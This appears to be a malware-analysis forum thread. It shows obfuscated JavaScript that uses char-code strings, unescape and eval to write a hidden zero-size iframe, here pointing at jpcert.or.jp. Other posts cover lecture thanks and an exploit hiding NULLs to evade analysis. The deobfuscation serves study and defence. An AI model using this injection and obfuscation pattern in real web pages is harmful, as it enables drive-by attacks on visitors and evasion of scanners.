var aots2010 = "60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62";
var c = unescape('var%20ww%20%3D%20aots2010%3Bvar%20xx%20%3D%20ww.split%28%22%2C%22%29%3Bfor%20%28i%3D0%3B%20i%3Cxx.length%3B%20i++%29%7Byy%20%3D%20String.fromCharCode%28xx%5Bi%5D%29%3Bdocument.write%28yy%29%3B%7D');eval(c);
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}
Which decodes to;
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}<iframe src="http://www.jpcert.or.jp" style="display:none;" width="0" height="0"></iframe>
-
Hi MysteryFCM,
Thanks for all of your helping, I was completed my lecture, and I think it was a success lecture. In my individual, I has learnt more about malware analysic and that will help me more on my work.
:D
Best Regards,
Den.
-
My pleasure :)
-
MysteryFCM pointed out I should link my thread to here as I've spotted something for a potential update to Malzilla. :]
http://www.malwaredomainlist.com/forums/index.php?topic=4006.0
Exploit obfuscating itself from automated analysis with NULLs scattered throughout the file.
-
Updated user agent file for anyone using this. Let me know if there's any others that should be added.